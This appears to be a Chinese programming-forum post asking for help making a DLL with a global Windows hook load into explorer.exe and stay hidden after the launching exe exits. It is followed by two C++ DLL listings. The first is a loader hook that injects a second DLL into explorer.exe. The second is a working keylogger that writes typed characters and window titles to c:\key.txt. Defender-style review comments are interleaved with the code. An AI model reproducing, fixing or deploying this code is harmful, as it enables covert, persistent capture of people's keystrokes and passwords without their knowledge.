钩子隐藏的深入问题,(111222,panda_w、Kevin_qing,prog_st,azuo_lee,5 table, vcmfc,jiangsheng...全来
如何使explorer.exe挂上我写的一个2.dll
要求是用一个exe文件使explorer.exe挂上我写的一个dll,dll中有一个系统钩子
,再使exe文件结束,但dll不从explorer.exe脱离,系统钩子开始工作,可以随
explorer.exe一起生死,
下面是我看了一个delphi的例子的一些开发经验,
我先有一个exe文件调用一个1.dll,这个1.dll也是一个系统钩子,使钩子开始工作,
并在钩子工作的同时做出判断他处理消息的母体是不是explorer.exe,如果是
因为现在这一段1.dll已经在explorer.exe的内存地址处了,我就为explorer.exe开
一个线程,loadlibrary(2.dll),并run(运行)2.dll中的另一个钩子,然后向exe程序
窗口发送WM_DESTROY消息终止exe程序,现在应该2.dll应该已经在explorer.exe中工作了
对不对?而exe程序和1.dll都已经退出.应该这个隐藏的在2.dll中的系统钩子就开始工作了对不对?
可是我可以调用2.dll中的系统钩子.但就是不能和explorer.exe捆绑,exe退出.2.dll也就退出了
还有向exe程序发WM_DESTROY消息窗口也不退出不知道是什么原因
请高手们帮助.以下是我的两个dll的原代码(高手们能不能帮我试试,是哪个地方出错了,
我对windows底层还是不太明白,大家一定要救小弟呀,先谢谢了
希望能有编译能过的原代码
一定给分
1.dll
nstall.cpp : Defines the entry point for the DLL application.
//
#include "stdafx.h"
#include "tlhelp32.h"
// Named data section "sharedata". The linker directive below marks it
// read/write/shared (rws), so every process that maps this DLL sees the same
// copy of `flag`.
// NOTE(review): a shared writable section can be changed by any process that
// loads the DLL, so a value kept here cannot be trusted as a security
// decision input.
#pragma data_seg("sharedata")
BOOL flag=false;
#pragma data_seg()
#pragma comment(linker, "/section:sharedata,rws")
// Module handle (saved in DllMain) and the handle returned by SetWindowsHookEx.
HINSTANCE hInst=NULL;
HHOOK hhook=NULL;
// Forward declarations for the hook procedure, the loader thread and the
// exported unhook routine defined further down.
LRESULT CALLBACK msghook(UINT nCode, WPARAM wParam, LPARAM lParam);
DWORD WINAPI loadproc(LPVOID param);
extern "C" __declspec(dllexport) BOOL clearMyHook();
// DLL entry point for the first listing ("1.dll").
// On process attach it records the module handle in hInst, which setMyHook
// later passes to SetWindowsHookEx. Nothing is done on detach; every path
// returns TRUE.
BOOL APIENTRY DllMain( HINSTANCE hInstance,
DWORD Reason,
LPVOID Reserved
)
{
switch(Reason)
{ /* reason */
case DLL_PROCESS_ATTACH:
// Remember which module the hook procedure lives in.
hInst = hInstance;
return TRUE;
case DLL_PROCESS_DETACH:
return TRUE;
} /* reason */
return TRUE;
}
// Exported: installs msghook as a WH_GETMESSAGE hook.
// The last argument (thread id) is 0, which requests a global hook: Windows
// maps this DLL into other processes on the same desktop when their threads
// retrieve messages. For defenders, a global message hook set from an
// unknown module, and that module then appearing in the loaded-module list of
// unrelated GUI processes, is the observable footprint of this call.
// Returns TRUE if the hook was installed, FALSE if one is already recorded in
// hhook or SetWindowsHookEx failed.
extern "C" __declspec(dllexport) BOOL setMyHook()
{
if(hhook != NULL)
return FALSE; // already hooked!
hhook = SetWindowsHookEx(WH_GETMESSAGE,(HOOKPROC)msghook,hInst,0);
if(hhook != NULL)
{ /* success */
return TRUE;
} /* success */
return FALSE; // failed to set hook
} // setMyHook
// Exported: intended to remove the hook recorded in hhook.
// NOTE(review): the guard is inverted. When a hook IS installed
// (hhook != NULL) the function returns FALSE without unhooking; when none is
// installed it calls UnhookWindowsHookEx with a NULL handle. As written, this
// routine never removes the hook, and hhook is never reset to NULL.
extern "C" __declspec(dllexport) BOOL clearMyHook()
{
if(hhook!=NULL)
return FALSE;
BOOL unhooked = UnhookWindowsHookEx(hhook);
return unhooked;
} // clearMyHook
// WH_GETMESSAGE hook procedure of the first listing.
// It runs inside whichever process the hook DLL has been mapped into; lParam
// points at the MSG being retrieved.
// On a left-button-down message it walks a process snapshot and, for the
// entry that is both the current process and whose szExeFile equals the
// hard-coded string below, starts a thread running loadproc (which loads
// "alltest.dll") and posts WM_DESTROY to a window of class "testhide".
// Defender view: this is a loader stage. The artefacts visible in this block
// are the module name "alltest.dll", the window class "testhide", and a
// thread created inside a process by a hook DLL rather than by that
// process's own code.
static LRESULT CALLBACK msghook(UINT nCode, WPARAM wParam, LPARAM lParam)
{
MSG *msg=(MSG *)lParam;
if(nCode < 0)
{ /* pass it on */
// The next hook is called, but its result is discarded and 0 is returned.
CallNextHookEx(hhook, nCode, wParam, lParam);
return 0;
} /* pass it on */
else if(msg->message==WM_LBUTTONDOWN)
{ /*HINSTANCE testdll;
FARPROC run=NULL;
testdll=LoadLibrary("alltest.dll");
run=GetProcAddress(testdll,"setMyHook");
if(run!=NULL)
run();
*/
BOOL bHandle;
HANDLE handleshap;
PROCESSENTRY32 lppe;
// dwSize must be set before Process32First is called.
lppe.dwSize=sizeof(PROCESSENTRY32);
handleshap=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
bHandle=Process32First(handleshap,&lppe);
while(bHandle)
{
// Act only on the snapshot entry describing the process this code is
// currently running in, and only if its name matches the string literal.
if(GetCurrentProcessId()==lppe.th32ProcessID&&lstrcmp(lppe.szExeFile,"C:\\WINDOWS\\EXPLORER.EXE")==0)
{
DWORD id;
// Second stage is loaded on a new thread of the current process.
CreateThread(NULL,0,loadproc,NULL,0,&id);
// Asks the window of class "testhide" to tear down.
PostMessage(FindWindow("testhide",NULL),WM_DESTROY,0,0);
}
bHandle=Process32Next(handleshap,&lppe);
}
}
return CallNextHookEx(hhook, nCode, wParam, lParam);
}
// Thread routine started from msghook.
// Loads "alltest.dll", looks up its "setMyHook" export and calls it if found,
// then sets the cross-process `flag` in the shared section. `param` is unused.
// NOTE(review): LoadLibrary receives a bare file name, so the standard DLL
// search order decides which file is loaded. From a defensive standpoint that
// makes the load location-dependent, and a module load of this name is the
// event to look for.
DWORD WINAPI loadproc(LPVOID param)
{
HINSTANCE testdll;
FARPROC run=NULL;
testdll=LoadLibrary("alltest.dll");
run=GetProcAddress(testdll,"setMyHook");
if(run!=NULL)
run();
// Written to the rws section, so visible to every process mapping this DLL.
flag=true;
return 0;
}
2.dll
#include "stdafx.h"
// Named data section ".JOE", marked read/write/shared (rws) by the linker
// directive below: hFile and prewnd are a single copy seen by every process
// that maps this DLL.
// NOTE(review): any process that loads the DLL can rewrite these values; a
// shared writable section is itself a finding in a security review.
#pragma data_seg(".JOE")
HANDLE hFile=NULL;
HWND prewnd=NULL;
#pragma data_seg()
#pragma comment(linker, "/section:.JOE,rws")
// Module handle (saved in DllMain) and the handle returned by SetWindowsHookEx.
HINSTANCE hInst=NULL;
HHOOK hhook=NULL;
//HHOOK hhook2=NULL;
LRESULT CALLBACK msghook(UINT nCode, WPARAM wParam, LPARAM lParam);
//LRESULT CALLBACK JournalRecordProc(UINT nCode,WPARAM wParam,LPARAM lParam);
extern "C" __declspec(dllexport) BOOL clearMyHook();
// DLL entry point for the second listing ("2.dll").
// Saves the module handle on process attach. On process detach it calls
// clearMyHook when a hook handle is recorded.
// NOTE(review): clearMyHook in this listing returns FALSE immediately when
// hhook is non-NULL, so the detach path does not actually unhook.
BOOL APIENTRY DllMain( HINSTANCE hInstance,
DWORD Reason,
LPVOID Reserved
)
{
switch(Reason)
{ /* reason */
case DLL_PROCESS_ATTACH:
hInst = hInstance;
return TRUE;
case DLL_PROCESS_DETACH:
if(hhook != NULL)
clearMyHook();
return TRUE;
} /* reason */
return TRUE;
}
// Exported: shows a "hi" message box, then installs msghook as a
// WH_GETMESSAGE hook with thread id 0 (a global hook, so the DLL is mapped
// into other GUI processes on the desktop).
// The installed procedure records typed characters (see msghook), so for a
// defender this call is the point at which keystroke capture begins. A global
// hook registered by an unrecognised module is the event to alert on.
// Returns TRUE on success, FALSE if already hooked or on failure.
extern "C" __declspec(dllexport) BOOL setMyHook()
{
if(hhook != NULL)
return FALSE; // already hooked!
// Visible popup; the last argument (uType) is passed as NULL, i.e. 0.
MessageBox(NULL,"hi","hihi",NULL);
hhook = SetWindowsHookEx(WH_GETMESSAGE,
(HOOKPROC)msghook,
hInst,
0);
// hhook2=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalRecordProc,hInst,0);
if(hhook != NULL)
{ /* success */
return TRUE;
} /* success */
return FALSE; // failed to set hook
} // setMyHook
// Exported: intended to remove the hook and close the log file handle.
// NOTE(review): the guard is inverted. With a hook installed (hhook != NULL)
// the function returns FALSE and does nothing; otherwise it calls
// UnhookWindowsHookEx with a NULL handle and then CloseHandle on the shared
// hFile value. As written, the hook is never removed by this routine.
extern "C" __declspec(dllexport) BOOL clearMyHook()
{
if(hhook!=NULL)
return FALSE;
BOOL unhooked = UnhookWindowsHookEx(hhook);
CloseHandle(hFile);
return unhooked;
} // clearMyHook
// WH_GETMESSAGE hook procedure of the second listing: a keystroke recorder.
// For every WM_CHAR and WM_IME_CHAR message retrieved by a hooked thread it
// opens "c:\key.txt", appends the title of the message window's parent when
// that parent differs from the last one seen (prewnd), and appends the
// character value; a backspace (0x08) truncates the end of the file instead.
// Defender view: the code captures typed text together with the title of the
// window it was typed into. The artefacts visible here are the fixed path
// c:\key.txt and the fact that the file is opened and closed once per
// character by whichever process the hook is running in, so many unrelated
// GUI processes touching the same small file is the pattern to look for.
static LRESULT CALLBACK msghook(UINT nCode, WPARAM wParam, LPARAM lParam)
{
if(nCode < 0)
{ /* pass it on */
// The next hook is called, but its result is discarded and 0 is returned.
CallNextHookEx(hhook, nCode, wParam, lParam);
return 0;
} /* pass it on */
LPMSG msg=(LPMSG)lParam;
char buffer;
DWORD number=0;
char winname[100];
if(msg->message==WM_CHAR)
{// a key was pressed
// Character code, truncated to one byte.
buffer=(char)msg->wParam;
// Title of the parent of the window receiving the character (at most 99 chars).
GetWindowText(GetParent(msg->hwnd),winname,100);
char *newname=new char[lstrlen(winname)+1];
lstrcpy(newname,winname);
// Log file is opened (created if absent) and positioned at its end.
hFile=CreateFile("c:\\key.txt",GENERIC_WRITE|GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
SetFilePointer(hFile,NULL,NULL,FILE_END);
// New parent window since the last logged character: write its title
// (including the terminating NUL) between CRLF pairs.
if(GetParent(msg->hwnd)!=prewnd)
{
WriteFile(hFile,"\r\n",2,&number,NULL);
WriteFile(hFile,newname,lstrlen(newname)+1,&number,NULL);
WriteFile(hFile,"\r\n",2,&number,NULL);
prewnd=GetParent(msg->hwnd);
}
switch(buffer)
{
case 0x08:
// Backspace: drop the last byte of the file.
SetFilePointer(hFile,-1,NULL,FILE_CURRENT);
SetEndOfFile(hFile);
break;
default:
WriteFile(hFile,&buffer,1,&number,NULL);
}
CloseHandle(hFile);
} // end of WM_CHAR branch
else if(msg->message==WM_IME_CHAR)
{
// Two byte values derived from wParam for an IME-composed character.
char chCharCode1 = (char)msg->wParam & 0xff;
char chCharCode2 = (char)msg->wParam >> 8;
GetWindowText(GetParent(msg->hwnd),winname,100);
char *newname=new char[lstrlen(winname)+1];
lstrcpy(newname,winname);
hFile=CreateFile("c:\\key.txt",GENERIC_WRITE|GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
SetFilePointer(hFile,NULL,NULL,FILE_END);
if(GetParent(msg->hwnd)!=prewnd)
{
// Unlike the WM_CHAR branch, the leading CRLF is skipped for the very
// first title written (prewnd still NULL).
if(prewnd!=NULL)
{
WriteFile(hFile,"\r\n",2,&number,NULL);
}
WriteFile(hFile,newname,lstrlen(newname)+1,&number,NULL);
WriteFile(hFile,"\r\n",2,&number,NULL);
prewnd=GetParent(msg->hwnd);
}
switch(msg->wParam)
{
case 0x08:
// Backspace: drop the last two bytes of the file.
SetFilePointer(hFile,-2,NULL,FILE_CURRENT);
SetEndOfFile(hFile);
break;
default:
WriteFile(hFile,&chCharCode1,1,&number,NULL);
WriteFile(hFile,&chCharCode2,1,&number,NULL);
}
CloseHandle(hFile);
}
return CallNextHookEx(hhook, nCode, wParam, lParam);
}